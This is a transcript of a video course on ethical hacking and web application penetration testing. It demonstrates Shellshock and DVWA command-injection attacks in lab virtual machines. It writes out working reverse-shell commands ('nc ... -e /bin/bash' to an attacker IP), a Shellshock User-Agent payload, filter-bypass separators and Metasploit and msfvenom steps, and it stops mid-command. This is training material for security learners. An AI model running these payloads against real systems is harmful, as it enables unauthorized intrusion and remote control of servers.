Welcome back. Time to cover another big topic for an ethical hacker, and that is web app penetration testing. This is another topic that you can further specialize in if you decide that this is what you want to do, but what it essentially is discovering vulnerabilities and bugs inside of a website. Why is this so important? Why are we devoting an entire section only for this, and we didn't throw this inside an exploitation section, for example, as a part of it? Why aren't we discussing all applications that you can run on a machine and not just web applications? Well, it's pretty simple. Websites are exposed to the internet. That means anyone can visit it and look at it. As good as this is, it also brings danger to the table. Because if anyone can visit it and look at it, then anyone can also try to attack it, right? For example, let's say we have a server hosting a web page on port 80 for HTTP and on port 443 for HTTPS. This website can be any type of website from chat forum to some university page. It doesn't really matter. What matters is that it's accessible to the internet by anyone who knows its domain or its IP address. So just by knowing the name of the website or its IP address, anyone can look at that website, even us from our Kali Linux machine. The problem is that an attacker isn't interested in just watching the web page and using it as it's planned to be used. An attacker will try to execute different types of the attacks, from code injection to brute force attacks if there is a login page. The attacker can even try extracting data from the database and changing the code of the web page itself. We can try uploading malicious files to the server to see whether that will work too. We can test for different user inputs to see if the input is well filtered or is the website code written poorly and doesn't filter any input whatsoever. You know what the best part is about all of this? A poorly written code that makes website vulnerable to some type of the attack doesn't only present danger to the server hosting that website, but it also presents danger to everyone that visits that website as well. For example, we can try to inject code into a certain web page, and if that is successful, that code will be displayed and ran by anyone that visits that page after the attack. This could be some malicious JavaScript code that could send the victim's private information to our Kali Linux machine where we can read it. We can also try injecting different redirection links into that website so anyone searching for that page gets redirected to our malicious website where we can steal their information. Imagine we do something like this on a website as big as PayPal. That would be a big problem, right? That's why web penetration testing is so important. And most of the attacks that we will cover are based on poorly written code. We know that websites are mainly made in HTML, CSS, and JavaScript code. All of them can be used to attack websites with code injection. And what code injection is simply writing code somewhere where you shouldn't be writing it. For example, let us say a website has a search bar where you can search different book titles. A regular user would type book titles in that search bar in order to find a book that they want to read. But an attacker would try writing code there. It might or might not work. If the user input, which in this case would be a book name, is poorly filtered and it allows anything to be written there, then the code injection will most likely work and we will be able to inject code into that web page. Cool, right? Now, the most dangerous one out of these three would be JavaScript code injection, or also known as cross-site scripting attack or XSS attack. Why? Well, HTML is static and the only thing we could do with an HTML code injection is to change the look of a web page. While with JavaScript, we can execute various functions which give us much more power. Another thing that we can try is to communicate with the database. For example, let's say a website has a login page where you need to input a username and a password. Usually big servers and websites will store those usernames and passwords inside of a database, and every time a visitor of the website tries to log in, the server will then communicate with the database. It will compare the visitor's input of username and password to see if they match with something from their database, and if they do, then the website will log in the user to their profile and the user will have access to all of their data. This type of communication between the website and the database can be done with something called SQL queries. And SQL is a language that allows us to interact with databases. It is heavily deployed in websites. Now, this right here is an example of a normal usage of a website. So the user sends username and password, website checks it. If it's inside its database, if it is correct, it logs in the user. If it is not correct, it will print out password incorrect or email incorrect or something like that. But what if we as an attacker try sending an SQL query instead of a username, for example? What then? Well, there are two outcomes. Either the web page is well coded and it filters out user input so that the website doesn't allow SQL query syntax and it will not even process it to the database. Or it is poorly written and it will just forward our SQL query to their database. And this can be critical because we can send a query where we request the entire database back and the database will just send us all of its contents where we will have everyone's usernames and everyone's passwords who have an account on that website. That would be really, really bad. And that is the reason this is one of the most dangerous attacks that you can do on a web page. It is also one of the most common ones as well. Ever read a heading inside of some newspaper that said something like 10 million credit card numbers stolen or some big website got millions of passwords leaked? Well, now you know how they do it. They do it by injecting SQL queries into a non-filtered user input. This attack is also known as an SQL injection. You're starting to understand now why this is as important as exploitation of network vulnerabilities that we did. Now, another type of the attack could be aimed at a server. And this would also be an attack through a user input field. Let's say, for example, we have a website that pings other websites. You input an IP address of a different website and our website will tell you whether that other website is up or offline. So we could type, for example, some random IP, let's say 75.101.23.55, and the next step is website pinging that IP to determine if it's online or offline. How would it do that? Well, it would most likely run the ping command on its system. So if the website is hosted on a machine, the machine would run ping 75.101.23.55, or if it is hosted on a server, the server could execute that command. I believe by now you can already see where the problem can occur. What happens if instead of an IP address we send a different command, such as whoami or ls? Well, as we already know, it will all depend whether the user input is well filtered. If it isn't, it will execute any command that we send, and then we can gain access to that server by trying to establish a connection with netget command just because someone didn't write website code well. All of these things that we discussed are also known as bugs. Or you might have heard about the term bug bounty. It is a pretty big thing. Websites will pay you to find vulnerabilities that we just talked about, and they will pay you a lot for them. And as we already know by now, all of these vulnerabilities happen due to poorly written code. Or in other words, these vulnerabilities can occur anywhere where the website will process a visitor's input. Whether it's inside a search bar, a username field, or inside of a link, if that what you send to the website is getting processed, and it doesn't get filtered, then we could have a bug. I will give you another example right here, just so you can test and try to figure out which vulnerability this is out of the three that we mentioned in this video. Let's say we have a website where you can watch videos or movies. So it's got a search bar where you can input a movie name, and then it will display the movies that you searched for. And now let's say that instead of a movie name, you send malicious JavaScript code. What vulnerability is this? I will give you 5 seconds to figure it out. And it is cross-site scripting or XSS attack. Don't worry if you didn't remember it. Each of these attacks we will cover in details, and we will see a practical example of each one of them. And also, besides these attacks, we will cover what I believe most of you are also interested in, and that is brute force attacks. And these brute force attacks are pretty much simple to explain. It is not a vulnerability. It is just a poor password or a weak password that someone uses that we manage to break, or should I say, guess. How do we guess it? Well, we send a lot of different passwords and hope that eventually we send the correct one. That is the entire process behind a brute force attack. And if the target's account has a weak password, and if that password is in the list that we're using to brute force, then it's pretty much game over. We will be able to get it. Now this can also come with different difficulties, such as if the website blocks inputting passwords after 5 wrong attempts, but this can also be bypassed. Nonetheless, these are some of the most known website attacks, and in this section we will see how to perform each one of them. See you in the next video. How do we communicate with a website? Most of you probably know this already, but I will mention it in this video just so we can get a quick refresher. We explained all of these attacks in the previous video, but it's important we know the basics behind communication between a client and a website. So we send requests and receive pages back with the help of HTTP requests and HTTP responses. HTTP request is something that we send to the website once we want to get a certain web page from that website. And HTTP response is a response from the website telling us that either it found the page that we were looking for or it didn't. HTTP response also contains an HTML code of that web page that we requested. Now, this would be a basic explanation of the process. But let us also take a look at how an HTTP request and an HTTP response look like. So if we take a look at this image right here, in the red letters we can see HTTP request to some web page, while in the blue letters we see an HTTP response. Let us focus first on HTTP request. So some of the known fields from the HTTP request would be ones you see in the image. We got hosts, and that field defines the website domain that you're searching for. Sometimes this field can also have a port number due to web servers sometimes hosting more than one website. Besides that, we also got the user agent field, and this field is used by server to identify the client that is connecting to the server. By identifying, I mean it will usually identify the web browser that the client is using. HTTP request can also have cookies, which we can't see here in this picture, but what cookies are values exchanged between a client and the server that are used for holding data and information about a certain session that the user has. Sometimes an HTTP request can also have authorization parameter, which is used to check for the identity. With this parameter, usernames and passwords are sent to the website. On the other hand, we got an HTTP response, which also has some special fields of its own. First thing we see is the status code. Now, a field called status code doesn't exist, but the value will be stored in the first line of the response. Most of you encountered at some point an 404 error once you try to search for a certain web page, and 404 in this case is a status code. In this picture, we can see a status code of 200, which indicates that the page exists and that we loaded it successfully. Besides this, we got set cookie field, and this field, if defined, will establish values of cookies to the client. This value server can use later to identify the client and to also store client's data. We also got a field called cache control, and this field is used if the content of the response should get stored inside the browser of the client or not. And we also got content length that will tell us size of the response in bytes. Below all of these fields, we can see HTML tags opening, and down there is the web page that we requested from this website. It sends us the web page code that will then get rendered inside of our browser, and it will show us the web page. Simple as that. Great. Now that we refreshed our memory about this, let us finally start attacking websites. See you in the next video. Welcome back. And in this video, I want to talk about another thing that we already covered, and that is enumeration and information gathering. So this is a step that you also shouldn't skip once attacking websites. We already covered information gathering, so this video is more like something as a refresher, just so you know which tools you can use to enumerate and to scan different websites. So for this section, we're going to be using Metasploitable most of the time. We're going to attack some different targets, but for the start, we're attacking Metasploitable. So make sure that Metasploitable is up and running. I also ran the ifconfig command, and it gave me the IP address of 192.168.1.8. So the first thing that we can do is try to visit the web page of that IP address, just to see what we have. And to do that, we can open our Firefox. And remember that once we attacked Metasploitable, we said that we're going to attack port 80 later in the course. Now it came that time. We are going to attack port 80. And once again, we're attacking port 80 because it hosts a web page. If I visit this IP address of my Metasploitable, it will open this page right here. It tells us the warning, the contact, and the login to get started. But down here we get a couple of links. If we go to any one of them, it will lead us to a different directory of this web page. Currently, we're in the /dev directory. If I go to the parent directory, it will go back to the 192.168.1.8, which is the main or the parent directory. If I go and visit dvwa, it will lead me to this directory right here, which is /dvwa/login.php. And this file hosts a login form. So we got username and password to input. If we take a look at this web page a little more clearly, we can see down here that it tells us default username is admin with password. So for now, we're not going to brute force this, we're just going to log in so we can see what we have behind this login form. And here it is. We got dvwa, or as we can see right here, it has this name. We get a warning, a disclaimer, and here we get a bunch of different attacks that we can perform. Remember, we talked about XSS, we talked about SQL injection, we also mentioned brute force and command injection, and these pages are pages where we can practice these type of the attacks. All of them are stored in a separate directory. Now, we can go about discovering all of the directories on a website like this, or we can use different tools to automate this process. So, to enumerate and to gather as much information that you can about the website, you can use the tools that we already covered, such as the Harvester to gather emails, such as WhatWeb to discover the website technologies, and all of them we already covered. We're not going to do that once again, but there is another cool tool that you can use to discover directories, and that tool is called Derb. Derb is already installed in Kali Linux by default, so only thing we need to do is to type Derb and we will get the help menu for this specific tool. We get a bunch of options as we can see right here, but also down here we get the examples of usage of this tool. So the most simple test, as it says in the brackets, would be just specifying derb and then the link to the web page that we want to scan. If I go up here, we can also see that we can specify different word list, but I believe derb has a default word list that it uses, so we're just going to go with that one instead. So if I type derb and then 192.168.1.8, Whoops, invalid URL, so we must specify derb and then http //192.168.1.8. So this is how we must specify a link. If I press enter, it will go and search for different subdirectories inside of that web page. If I scroll a little bit up, we can also see it managed to find some of them. It found /index, /index.php, /phpinfo, /phpinfo.php. We got /test, /tvwiki, and if I go all the way down, we should be able to find even more subdirectories on that web page. And right here, we might be able to find something interesting. For example, we can go and visit any one of them. Let's visit robots.txt. If I copy the link, go up here, paste the link, we get something right here. User agent, disallow. We already know what user agent is. It is a field inside of the HTTP requests. Let's also see what else we managed to discover. We got /test, /themes, readme, phpMyAdmin. That could be useful. Let us check out what this is. You never know. Anything that you find particularly useful or interesting, you might want to check out by visiting that page. And this seems to be some file with the PHP code. So let's go and check out something else. And it seems that there is a directory called passwd. Let's see what this is. If I copy that as well, go and paste it. Missing fields, fields go with marker required. Please go back in your browser and try again. Topic web home. So it seems that this page is missing some fields. Right now we don't really know what this is all about, but by visiting this we discover more and more pages that we might not be able to find once browsing through that page on our own. Now right here we can also notice some other information that we get on the side besides these links, and that is the code. And if you remember, this code is simply just a status code which tells us whether it managed to load a page. Right now we get code 200 for most of these pages. Sometimes we will get code like 304, which means that the page gets redirected to a different page. And at the right, we also get the size of that specific page, which is not something that we're currently interested in, but you also get that information if you want to see it. We can see other links as well, and you would go about visiting any link right here that you find interesting. So let us go down, and it seems that it found 56 links, but that is only with this specific word list. It also downloads, I believe it downloads the contents, but I'm not really sure about that. However, what you can do is, if you're not satisfied with the results from this derb directory, you can specify your own word list if you want. Nonetheless, this is not that of an important tool for us. However, you can use it if you'd like, and you can combine it with different tools that we covered for the information gathering to gather as much information about a specific website. Now, since we already covered information gathering, I'm not going to go into those different tools. You can also try finding new tools from the GitHub or somewhere else, and you can experiment with those tools as well. But right now, what we're going to do in the next video is we're going to configure a really important tool that is called burpsuite. And as soon as we do that, we're ready to perform our first attack. Welcome back. Time to configure the tool called burpsuite. And burpsuite is a tool that allows us to intercept and take a look at different HTTP requests and HTTP responses. It also allows us to change those HTTP requests to our liking and then forward them to our target. It is also considered a proxy, so everything and every link that we visit through our Firefox from now on will go through burpsuite first, and we will be able to inspect all of our HTTP requests and responses. Let us see how we can configure it and get it to work. So we already got burpsuite inside of our Kali Linux machine. If you go onto the menu and then Web Application Analysis, you will have it right here. The first thing that we want to do is double-click it to start it up. This will start up the burpsuite Community Edition, and there is also a Professional Edition that you must pay for, but for now on, we're just going to cover the Community Edition inside of this course. It might give you this error, you just want to click on OK. And in just a few seconds, we should have the main menu of Burp Suite open up. And here it is, terms and conditions. I want to click on accept. And here it tells us an update is available. I'm not really interested in the update at the moment. Here I want to select the temporary project, click on that and click on next. I want to select right here use burp defaults and start Burp Suite. After a few seconds, it should open something like this. And we can see a lot of things are happening on our screen. If I enlarge it, you will see that we get a bunch of different options with this Burp Suite tool. But let's not think about them at the moment. For now, let us just think about how we can configure our Burp Suite to be used by Firefox as a proxy. Well, the first thing that we want to do is navigate to the Burp Suite tool, click on Proxy right here, and under the proxy we get this Options tab. Under the options we will have these proxy listeners, and under the proxy listeners you want to select this right here and you want to click on Edit. If you don't have anything right here, just click on Add. Here we want to bind to port 8080 and we want to bind to address loopback only. Once you get this set up, click on OK. And after you got this, what we want to do is we want to navigate to our Firefox, and on these three lines right here we want to navigate to the Preferences. Under the General tab in the Preferences, we want to navigate all the way down, and at the last option where we got Network Settings, we want to click on Settings. Here it will ask us to configure proxy access to the internet, and we want to set right here Manual Proxy Configuration. Under the HTTP proxy, we want to set the IP address, and in our case we're going to set the IP address of our local host, which is for everyone this IP address right here, and the port should be 8080. And then we can set use this proxy for all protocols. Also make sure that the SOCKS v5 is checked, and once you do all of that, you can click on OK. Now that we did this, if I go and try to visit google.com, it will tell me software is preventing Firefox from safely connecting to this website. And you should get this error too. Why does this happen? Well, our Firefox doesn't really trust our Burp Suite tool. And currently, all of the packets are going through this tool before we can see them on our screen. So we're getting a warning from the Firefox that some software is preventing from having a secure connection to that website. What can we do about this? Well, we can go to our Firefox and visit any HTTP website that we want. It won't present us a problem for HTTP websites. It will only present us a problem for HTTPS websites. But we also want to visit HTTPS websites such as Facebook, such as Google, and all the others. To do that, we must type this link inside of our search bar, which is http:// and then burp. Press enter, and you will open this page right here. It will tell us welcome to Burp Suite Community Edition, and here we will be able to download the certificate, which we can then import inside of our Firefox and make Firefox trust our Burp Suite tool. So just click on CA certificate, click on save file, and click on OK. Once you do that, the file will be inside of our downloads directory, as we can see it right here. This is its name, and all we need to do is go back to the Preferences inside of our Firefox, navigate to Privacy and Security, and all the way down we will have a certificates part. Under the certificates part, we want to click on View Certificates, and we want to click on Import a Certificate. Then you want to navigate to the downloads directory, select the certificate that we just downloaded, and then click on Open. We want to select Trust this CA to identify websites and Trust this CA to identify email users. Click on OK, and also click on OK right here. If I go back and I refresh google.com, it seems to still load. It doesn't really do anything. So why isn't it loading our page? Well, in the Burp Suite by default, you should see if you go back after trying to open Google once again, that this proxy will turn orange, and this intercept will also turn orange. So if we go to proxy and then intercept, we will have an HTTP request. And this is a request that we just initiated to the host www.google.com. We can see all of those fields that we talked about, such as host, such as user agent. Under the user agent, we can see which type of web browser are we using. We can also see the cookie right here. And the reason why we are not loading the page and it is still loading right here is because the intercept is turned on. This means it will intercept this packet before it actually forwards it to the web page. We can forward it manually by pressing this, or we can just turn the intercept off and then it will not intercept any packets. So if I go back to Google, right now you can see we successfully loaded Google. If we want, we can go right here under the target and we can see all the links that we visited while the burp suite was running. So we can see Google right here, and we can see all of the requests and responses that we got for the Google. So here is the request for the www.google.com that we just did, and here is the response from the Google that says status code 200 OK, which means we successfully loaded the page, which we indeed loaded, and here is the code of that page. Cool, right? Now we can intercept any packets to any website. Great. Now that we covered configuration of burp suite, in the next video, we can go and perform our first attack. And in the future videos, we're also going to cover more details about this burp suite tool, but for now on, we just managed to configure it and we're ready to, in the next video, perform our first attack. See you there. Welcome back. It is time that we cover our first vulnerability in a website. And as a first vulnerability, I've chosen to show you the Shellshock exploitation. Now, Shellshock is an older vulnerability. It was discovered in 2014, and you will most likely never find it today while performing penetration tests. But nonetheless, I want to show it to you just because of the impact that it had. Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. This vulnerability occurred due to Bash differently processing environmental variables. With this, many things were hit from DHCP clients, from terminal command lines to CGI scripts inside of a web applications. And in this tutorial, we will see an example of exploiting Shellshock through the CGI script on a web page. Also for this, we're going to download a small ISO file that will allow us to run a virtual machine only for this vulnerability. Don't worry, it will only take a few seconds to install due to it being a small virtual machine, and it is only purposely designed for this specific vulnerability. To download it, you want to go to your Google, you can type in Pentester Lab Shellshock, and you should see a link like this that says CVE 2014-6271 called Shellshock. It will be from the pentesterlab.com, and you want to click on it, and it will navigate you to this page right here where you will have the Shellshock introduction, fingerprinting, and all the other stuff regarding this vulnerability. However, we're not going to go into these details right here because we want to exploit it ourselves. What we want to do is we want to go to the files right here, and you should see this ISO where you want to click on it, and it will download the ISO image with the size of 19.1 megabytes. So you can see it is really, really small. Once you do that, you want to go to your VirtualBox and you want to create a virtual machine as we usually do. Now, I already got Shellshock Lab created with the ISO file that we just downloaded, but what you essentially want to do is you want to click on New, then you can call it anything you want, you can call it Shellshock. You can select right here Linux as an operating system, and the version of Linux is going to be Other Linux 32-bit. Click on that, then you can proceed to Next. You can leave it to 256 megabytes of RAM, that is more than enough for this machine. Click on Next right here. We want to create a virtual machine, Next here as well, and we can click on Create. And as usual, there are two more things that we want to do once we create a new virtual machine. We want to navigate to the settings. From the settings, we want to go to Network, switch from the NAT to Bridged Adapter. select your adapter right here. And another thing that we want to do is we want to add our ISO file. So delete this empty right here. Click on the disk icon, click on add, and find the ISO file. In my case, here it is, CVE 2014-6271. Click on choose and click on OK. This will create your Shellshock virtual machine. After you do that, you want to go to your Kali Linux, start your burpsuit tool that we covered already, that we covered the configuration of, and you want to go start it up. And after you start it up, you can open your Firefox. Now, you might have noticed if you tried before watching this video that once you try to visit Firefox without having burpsuit running, you will not be able to visit any page. And that is because we set our burpsuit to be a proxy for our Firefox. So now, every time you want to visit Firefox page or any website page, you must have burpsuit open. And you must also have the intercept turned off so it doesn't intercept any packets. Otherwise, your page will just load forever. Now that we opened the Firefox, let us open burpsuit 2. It is starting the project, and as soon as it opens up, we will be able to visit our page on our Shellshock virtual machine. Okay, so now that burpsuit opened, go to target, then go to proxy and turn off the intercept right here. So intercept should be off. Once you do that, the next thing that we want to do is we want to start our Shellshock virtual machine. If you're starting it for the first time, it should only take a few seconds to set everything up since it is a really small virtual machine. And once it opens up, it won't even prompt you for a login. There is no login available inside of this machine right here. It will just enter the command line where we want to type ifconfig just to find out the IP address of this machine, and in this case, it is 192.168.1.10. So all we want to do is we want to go to our Firefox and visit this page to see what we have. And this seems to be the entire page of this virtual machine. We get this system is running, the time that it is running, currently for 0 minutes because we just started it up, and we get the kernel of that virtual machine. Now, if we take a look at our burpsuit right now and we go to the targets and we go to our IP address of the Shellshock virtual machine, we will see all the links that we requested once trying to open the web page of our Shellshock virtual machine. We will see this /directory, we will see this JavaScript file, and we will see this CGI bin status directory. So we get a CGI script right here. If we go to the response of that request that we sent, and to do that you simply just select the request that you want to go to and click on response right here. Then we will see down here this output that looks a lot like an output to the command uname-a. For example, if you run the command uname-a inside of your terminal, it will give you an output like this, which will tell you which version of Linux are you running, and so on and so on. We get a similar output inside of our burpsuit, as we can see right here. And in most cases, this output is ran by the uname-i command, and it is ran by bash. And inside this request that we did, user agent field that we got inside of the request is an environmental variable when processed inside of this CGI script. So what we can try is to inject a command in that field, however, it won't work that easy. We can't just inject, for example, whoami command instead of this. It will not give us any output back. You might be asking why? Well, because Shellshock vulnerability is based on first specifying an empty function. And I know this might sound confusing, but just stick with me for a couple more minutes and I will explain it how it works. The vulnerability itself was discovered when inside of an environmental variable such as this user agent, empty function syntax was specified. And empty function syntax looks something like this. Let me show you inside of the terminal. It is this set of characters. So open bracket, close bracket, then space, open curly bracket, then space, 2 dots, dot and comma, and closed curly bracket, and at the end another dot and comma. And this right here is a syntax for an empty function. So any command that we want to run, before it, we must have this empty function syntax. Why? Well, when bash gets these characters in this order, or if bash gets this empty function with the variable, instead of blocking it, it will accept it with the variable that comes after, and it runs it as a command on the server. And that is the entire vulnerability. All we have to do is to specify a command after this syntax, and it should work. Now, to do that, we must send this HTTP request right here to this CGI bin script once again. And we must specify instead of the user agent, the empty function syntax and then our command. So how can we do that? How can we send the request once again? Well, luckily, Burp Suite allows us to edit our requests and send them as many times as we want. All we need to do is to select the request that we want to send again. So we select it right here. Then we right click and send to repeater right here. Then you will see this repeater part light up. We want to go there, and here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the user agent field. Let us remove this. And let's type the syntax for the empty function first. So open and closed bracket, then empty space, open curly bracket, then space, 2 dots, comma and dot, close curly bracket, and comma and dot at the end. Now, what you can do after this is you can inject your command. And if you want to, you can test to see if it works with a ping command first. But I'm not going to test it with a ping command. I'm going to straight away try to establish a connection with our Kali Linux machine and get a reverse shell back. So what do we want to do right here to establish a connection with our Kali Linux machine? Well, we want to execute /bin/bash. And this will tell the target to execute the following command. If we specify -c after, it will tell our target that whatever we send after this will be our command. And we must specify it between the single quotes. So for now, we have the empty function syntax, then /bin/bash-c, then open single quotes and close single quotes, and in between the quotes, we type nc, which stands for netcat, and we specify the IP address of our Kali Linux machine. So let's check it out right here. Sudo ifconfig, test1234 is my password, and I will specify 192.168.1.9. So right here, 192.168.1.9, and I want to specify also the port to connect to. In my case, I will use port 12345, it doesn't really matter. And at the end, we want to specify -e, which stands for what we want to execute on our target machine. And we want to simply just use the bash shell. So we can do that by specifying /bin and /bash. And this is the entire command. I will copy it to my terminal so you can see it enlarged. So copy, and if I clear the screen, paste it right here. This is our entire command, the empty function syntax, and then the function that allows us to establish a connection to our Kali Linux machine. But before we send this request from our Burp Suite, we must set up a listener right here. So I'm just going to go and type nc lvp and then on the port that we specified, which is 12345. Press enter. This will listen for the incoming connections, and now that we changed the user agent field to our command, we can click on send. If I go back to our Kali Linux terminal, we can see we got the connection from our Shellshock virtual machine. And if I try to execute commands such as whoami, all of that will work. We can see we are the pentester lab. The ls command will give me all of the directories inside of the current directory. I can type the pwd to check out my current working directory, and I am in the /var/www/cgi-bin folder. Great. So we successfully exploited the Shellshock vulnerability and gained access to this machine. Now, you can also automate this entire process with Metasploit framework. So what we did right here is we manually exploited the target with the help of a Burp Suite. We sent our request for the CGI bin script to the repeater, Then we change the user field to our command, which requires the empty syntax at the beginning, and after it, the command that we want to execute, which can be any command that you really want. Then we set up a listener inside of our terminal, and we sent this packet once again, or we sent this request once again. Right here we can see the response to this request, and it tells us that we got the internal server error because it doesn't really recognize this user agent. However, it did execute this command, which is all that we want. Inside of the Metasploit framework, you can type search shellshock, and you can use this exploit right here, which is exploit multi HTTP Apache mods CGI bash environmental execution. You can copy that, type use, and then paste the selection. It will set our payload to be Linux x86 Meterpreter reverse TCP. And if I type show options, I can set my options right here. So what I must set is the rhosts, which is the IP address of my target machine. Let's do that first. What I also must set is this rpath. So this will be the path to the CGI script. So the rpath must be set to CGI-bin/status. If I'm not mistaken, that is the path. Let us see inside of our burp suite. So it indeed is CGI, bin, and then status. And all we're left to do right now is set this and run our exploit. So, oh, pardon me, it's not there. Let us just go and set the target URI. It is target URI that we must set to be the CGI bin status. So let's just set the target URI instead. And let's set the rpath back to /bin, I believe, and let's give this a try. We send this, we get the Meterpreter session 1 opened, and here it is. Get user ID will tell us who we are. We can execute the commands, and we can do everything that we did inside of our exploitation section. So we successfully exploited Shellshock vulnerability in two different ways. Manually, by using burp suite and sending our command in the user agent field, and with the help of this Metasploit framework module. It also exploited the user agent field, as we can see right here. We told the path to be CGI bin status, and we got the Meterpreter reverse shell back. Great. Now that we did this, in the next video, we're going to check out a very similar thing to this, which is called command injection. See you in the next video. Welcome back. In this video, we're going to cover command injection vulnerability. We already know what this is, and we already covered some type of command injection in the previous video once we exploited the Shellshock vulnerability. However, now we're going to do it on the web page itself. So, do you remember this example on the screen that we talked about? Say we have a website, and that website can ping an IP address that we tell it to ping. And it will tell us whether that IP address is offline or online. Well, we're going to take a look at this example inside of our Metasploitable. So, for this, you want to start your Kali Linux machine and your burp suite inside of your Kali Linux machine. Now, we won't be using burp suite in this specific video, but nonetheless, we must have it started because we connected it to be the proxy to our Firefox. If it is not open, we won't be able to visit web pages. After that, you also want to open up your Metasploitable virtual machine and check its IP address, and then we want to visit the command injection page on our Metasploitable machine. So go to your Firefox right here, type in the IP address of your Metasploitable. It will lead you to this official page where we want to go to DVWA. Let us log in with the credentials that they give us, which is admin for the username and password for the password. Click on login. We don't want to save these credentials, and we want to go to the command execution, or otherwise known as command injection. But before we attack it, let us go to DVWA security and set the security to low, because right now we can see down here that the security level is set to high. So let's go right here, check this arrow and click on low. Now, so you can see everything better, I'm going to zoom all of this in. And once you set the security level to be low, you want to click on submit. Great. Now let's go back to our command injection. So as we can see, it tells us that we can ping an IP address for free. So all we need to do is enter an IP address and it will give us a result of whether it is offline or not. Let's give it a try. If I type, for example, the IP address of my router, which is 192.168.1.1, and I click on submit, let us see what it will tell us. And here is the output. It seems to work and it gives correct results. My router is indeed up and running. But if you take a closer look at this output that we got right here, it seems that this is the same output that we get when running ping command inside of a terminal, right? So if I go to my Kali Linux machine and I open the terminal and I type the command ping 192.168.1.1 and I only want to ping it 3 times, if I press enter, well, we pretty much get the same result right here. It will ping my router 3 times and it will give us a similar output to our Metasploitable page. What does this mean? Well, it most likely means that this web page forwards the command to the server, which in our case is our Metasploitable machine, and then that machine executes ping command to determine whether that IP is up or not. Another cool thing that we get with this page is if I scroll down here, we can see view source, and this is the source code to this page. So we can see whether they filter the input or not. But let us not check source code yet. Let's not cheat and let's just try to execute command injection and get it to work. So how are we going to do that? Well, we can try to execute 2 commands inside of this input bar right here. It does ask us for an IP, but we can also try to concat another command after we specify an IP address. For example, if I type 192.168.1.1 and I type dot and comma to separate the commands, and after it I type ls-la, which stands for list all including hidden files, and I click on submit, and it works. It gave us both results from the both commands back. It pinged the router first, and after it, it executed the ls command, and we can see what files our target has. This means there is command injection vulnerability. Because this is something that we shouldn't be able to do. We shouldn't be able to execute other commands outside of this ping command. So let us try different commands as well. So let us enter the same IP address, then dot and comma, and then who am I, for example. And it does give us the output of that as well. We are www-data. Okay, but how can we exploit this and gain access to the target with the help of this command injection? It's quite simple, actually. We can use netcat for that. So if we start listener in our Kali Linux terminal, if I go right here and type nc-lvp, and then I'm going to use the good old 12345 port. I start my listener right here. And I go back to this page and run the following command. So I type the IP address, then dot and comma, and then nc-e, where I tell it that I want to execute /bin/bash. And I, after it, specify the IP address of my Kali Linux machine, which in this case is, let me just check it out, 192.168.1.9. So I specified right here 168.1.9, and the port is going to be 12345, which is the same port from our listener. I click on submit, and if I go back to our terminal, we got the connection right here. So we exploited the command injection vulnerability. We can run the commands, type ls, go back and switch through the other directories, and we can check out all the other files. Here is the password file, so we can also check out the passwords. We can check out other commands as well, and everything works great. We exploited this target. Let us exit out of this, and now that we successfully exploited this vulnerability, we can take a look at what the source code was. So let's go down here, click on view source, and if I enlarge all of this, so we can see it a little bit better, if we take a look at it, we will see that it didn't really filter any user input. They just requested the IP that the user inputs, and they forwarded that IP address to the ping command right here and right here without any filtering whatsoever. That was a big mistake, since because of this we were able to gain access to the target system. Now let's give it a try on a medium security level and let's see whether we can exploit it then. So I'm going to close this source code, go back to DBA security and change from low to medium. Click on submit, and now the security level is medium. Let's go back to the command injection, and now that it is on medium level, let's give it a try. Let's just start with the same thing that we did previously and try to execute the ls command. So if I go right here, type 192.168.1.1 and then dot and comma, and then for example ls-la. If I click on submit, well, nothing seems to happen. It doesn't seem to work anymore. However, luckily this dot and comma aren't the only ways we can run two commands. If I go to my terminal, if you type for example ls dot comma whoami, it will execute both of these commands. So it will give us the output of these commands and then Mr. Hacker as well. But you can also do it like this. Specify these two signs and then whoami, and it will do exactly the same thing. So let's give it a try like this. Maybe they filtered this character, but they didn't filter it like this. If I go here and type 192.168.1.1 and then these two signs and then for example ls-la once again, click on submit, and this will do the same thing. It will still not work. Okay, let's do the same thing but just delete one of these signs that we put right here. If I show you, right here, copy the same command, paste it right here, and I remove one sign, it will once again execute both of these commands, just as two different processes. So it might execute one before another, however, it will execute both of them. Let us go right here and give it a try, 192.168.1.1, and then one of these signs, and then ls-la. Click on submit, and it works. We get the output of both ping commands and the output of all of the files inside of the current directory on that target system. So first two tries didn't work, probably because those characters were getting filtered and blocked, but if we specify it like this, here, then it seems to work. It seems to bypass any security and it executes our second command. So if I go down here and we take a look at the source code, I enlarge this so we can see the entire code. It seems that they created some type of a blacklist right here. So they removed these characters and this character right here. So anyone that tries to specify a command injection with these characters, it will not work. That's why this is medium security level, and you need to go through a few more commands in order to bypass this. However, it is still bad because they filter some characters out, but others they don't filter at all. For example, besides this one character that we used, we can also exploit it using the pipe character. So I can type 192.168.1.1 and then the pipe, which is this upper line, and then after it I specify ls-la. And this will work as well. As we can see, we get the output of ls-la command. Great. Now, if we were to change the security level to high, I think I read somewhere that high is an example of how the code should be written, so it isn't really exploitable. You can change it right here, you can submit, and you can go to the command execution and check out the source code right here. It seems to only require the integers, and it checks whether all of your inputs are integers, and it splits the IP address into 4 octets. It does that first, it splits it right here, then it checks if every octet is an integer, and if it is an integer, then it combines those octets once again back, and it pings that target. Okay, so we have covered command injection vulnerability, and now you know how to try to find it and exploit it. In the next video, we're going to move on to the next vulnerability. See you there. Okay, so we have covered command injection. But you can combine this vulnerability with other tools as well. For example, in the last video, we managed to establish connection using netcat and command injection vulnerability. But we can improve this by injecting a different payload, such as a Meterpreter shell or a reverse shell that we coded in Python. The process of doing that is the same, so I will show you how to send a Meterpreter payload to the target and make it execute with command injection. Why would we want to do this? Well, we always want to have the best payload possible. So why would we use netcat when Meterpreter gives us a lot more useful options to run on the target system? And to do all of that, here are the steps that we must perform. We must first create the payload appropriate for our target. Then we must download that payload to our target machine with the help of command injection vulnerability. And at last, we must execute that payload also with the help of command injection vulnerability. So, sounds pretty simple, right? Let's figure out what payload we should create first. So to create payload, we need to figure out what do we know about our target. Well, we know that Metasploitable is a Linux 32-bit machine, so we can create a Linux Meterpreter payload. But for this case, I like Python payload a lot better. So let's create a Python Meterpreter shell. Great thing about Linux systems is it comes default with Python, so Python payload is something that we can execute on our target without them having to install any additional software. Let's create it real quick. So I will navigate to my desktop directory, and here I will type msf venom -b, and I will specify that we want to create Python Meterpreter /reverse TCP. The lhost is going to be our IP address, so let's check it out real quick. It is 192.168.1.9. Copy it and paste it right here. For the L port, we can use port 6000, for example, and we are going to output this to arrows into 